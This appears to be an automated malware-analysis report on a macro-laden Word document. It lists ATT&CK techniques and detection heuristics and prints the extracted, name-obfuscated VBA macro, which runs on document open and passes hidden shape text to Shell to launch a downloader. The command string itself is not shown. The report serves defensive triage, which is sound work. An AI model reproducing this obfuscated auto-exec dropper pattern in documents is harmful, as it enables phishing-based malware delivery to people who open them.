MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on document open, utilizing the Shell() function to execute a command. This command invokes cmd.exe with a complex set of instructions that ultimately calls PowerShell to download and execute a second-stage payload from a list of embedded URLs. The presence of cmd.exe and PowerShell execution, along with the Shell() call, strongly indicates a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Malware.Dkah-6765077-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkah-6765077-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ZdnBRc = CByte(149723020) VNQLZUnr = Array(HfFHwE, Interaction.Shell(lsvBmLwM, FKqlNEDRiHO), zfiFXY) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5493 bytes |
SHA-256: 434fdb9e79053dab9b439dace7a11c6d57697fe2e3b3bff58fd39c55aa84bc89 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
127 of 187 identifiers look randomly generated (e.g. 'JKScrnbpN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KdJhHpwIH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
YwjwBv = Atn(LLtQZQow)
ovWijuz = CLng(suKqr)
lLDfDCwB = Cos(QFhMtfhw)
NpiadTi = CByte(zbDGkpU)
IFWkktdn = CByte(38106911)
dwhFc = CBool(72932148)
icBwKhjAZ = WzijP
jlaLMr = 131470088
vUXpjw = CByte(286608830)
On Error Resume Next
buvXwsXKF = Atn(hHMsQiZ)
kzvMpDjw = CLng(KLclvrM)
ZhqYMC = Cos(wSPfqj)
zGUVAC = CByte(FrqARN)
crmQAZqBi = CByte(76103914)
ubPXoAI = CBool(305646267)
NWQarKCUp = YupUU
dPpGVwX = 59571181
GaAiDqrXO = CByte(246694552)
On Error Resume Next
snSosMTH = Atn(JdZYjoB)
XKYknMU = CLng(bdhbrzB)
ziEQs = Cos(dmQDXOEz)
FRkMpuDEa = CByte(JRjljmJbQ)
Ekkiijm = CByte(129721883)
oGadmcJG = CBool(261593598)
PvZdTi = uAkQOno
mUhGdJH = 237776620
mrjowJX = CByte(211238779)
Set MZpXWMi = Shapes("GNrYjbmJk")
On Error Resume Next
zkrNTMbV = Atn(sCiKc)
ZoTzUYICb = CLng(sCjORhcJ)
ZipTp = Cos(kNQVpW)
aMupc = CByte(ZJohPc)
JsGkLZZ = CByte(40605060)
NjUih = CBool(237891263)
shmPkb = UcEIkuk
arOIrGjJP = 319295029
XzLUw = CByte(255942528)
On Error Resume Next
zGrEj = Atn(sjOws)
bGtJdzcA = CLng(wuNiS)
zrzWko = Cos(ZMpAnHP)
GwEEWql = CByte(zWrWAB)
daQpus = CByte(110584654)
IvFhhTc = CBool(73030503)
lfpwJZv = McAAsRU
AMaXSVd = 277085773
vJQJEuU = CByte(75398708)
On Error Resume Next
UkaYG = Atn(cXhvu)
SEihKlKhP = CLng(zsEGnpPGj)
BtOOJPPL = Cos(zXqwKHi)
nzhYH = CByte(WkiTzTnHb)
MsYpPX = CByte(307091436)
wHRaJtu = CBool(337890885)
ibIzI = CsibvPsmp
cmRjprPCL = 172253017
ZwbpZAKEf = CByte(120336260)
lsvBmLwM = MZpXWMi.TextFrame.ContainingRange
On Error Resume Next
pUkaijlc = Atn(UmTVTXK)
vuiEOM = CLng(TdIwXIowW)
aVFJjMto = Cos(WfYCRHor)
tbbbHqHFb = CByte(ENjozotB)
IOipP = CByte(208834985)
OuarqjQoF = CBool(307691216)
wOOCb = GjVqqaOY
jjlKm = 79775784
RcMijwVwr = CByte(233374617)
On Error Resume Next
SXTVSMsF = Atn(pGZhlluw)
wzPclDco = CLng(YjkzMlu)
RDJhAr = Cos(oMtNjoNk)
vDZXplPt = CByte(mTWAqto)
XUqpCwGd = CByte(267770879)
KPHlLwD = CBool(26562264)
LXXfn = DNXPnW
YtQtursHT = 300998937
MFiXA = CByte(52561296)
On Error Resume Next
NkwkQ = Atn(VzVSIjd)
OXjJv = CLng(AXpaKAO)
IKohXAC = Cos(imlzTwsoo)
HWnzAVvuI = CByte(uVZQQvpLd)
LdHOtuX = CByte(333062911)
DiAmQ = CBool(295056850)
nIJSmcrLF = MVhYH
LNidPZGF = 333632127
tEMtiJXXH = CByte(215143611)
On Error Resume Next
ouoqqEQq = Atn(ZSlAPwipR)
EFhFN = CLng(ijwdkz)
JKScrnbpN = Cos(QiNzR)
woavQKiHp = CByte(YMXTNLb)
bpwTnCp = CByte(107438510)
zQazTNqAo = CBool(64312544)
bwcKn = OPRtuE
nXbtc = 6339277
GzUkrPc = CByte(33945860)
Const FKqlNEDRiHO = 0
On Error Resume Next
tdzqzzzzz = Atn(iEIMWS)
AiXKwhjX = CLng(TilGP)
oOXwhKZ = Cos(sVRKsrWEm)
PJtlkuwRT = CByte(jUMrvDQt)
Zkibjioj = CByte(149707879)
fnOspqGi = CBool(18666129)
cAQrkSX = aPpbc
MKliJG = 314387759
ZdnBRc = CByte(149723020)
VNQLZUnr = Array(HfFHwE, Interaction.Shell(lsvBmLwM, FKqlNEDRiHO), zfiFXY)
On Error Resume Next
fDQwjkDj = Atn(vVDdLQw)
PLDzPQ = CLng(XipuUzjYF)
kAOTUNzs = Cos(qitzZMi)
EkLoP = CByte(XZzvJMcO)
zqaQjrvwF = CByte(47400500)
aPilQhlq = CBool(186912000)
uzUOruWS = fCbhwGwv
RJlFhfLHu = 81084016
bammICs = CByte(40222307)
On Error Resume Next
fwRFIHVr = Atn(wufIWwiG)
JPibmXdl = CLng(rtXED)
lRUQsqZN = Cos(jNwAYH)
TpCfqzDKu = CByte(WHdwJtr)
XFbNNwjCQ = CByte(294413800)
YdNszZi = CBool(14518439)
wnNKWQU = jTZUHJ
CSGbD = 310325948
jLlVwJOj = CByte(162198152)
On Error Resume Next
CFUtpid = Atn(srfTNQCV)
cCvicEd = CLng(zoWKsvn)
fApdjz = Cos(nWJXwFPF)
WEbcBtZA = CByte(TptGizvsG)
PMrrdSHI = CByte(129789894)
iTkjponU = CBool(69962047)
laonPJ = hrJcGzhpU
NzJtlGT = 80808355
FKRqLahtw = CByte(274157749)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.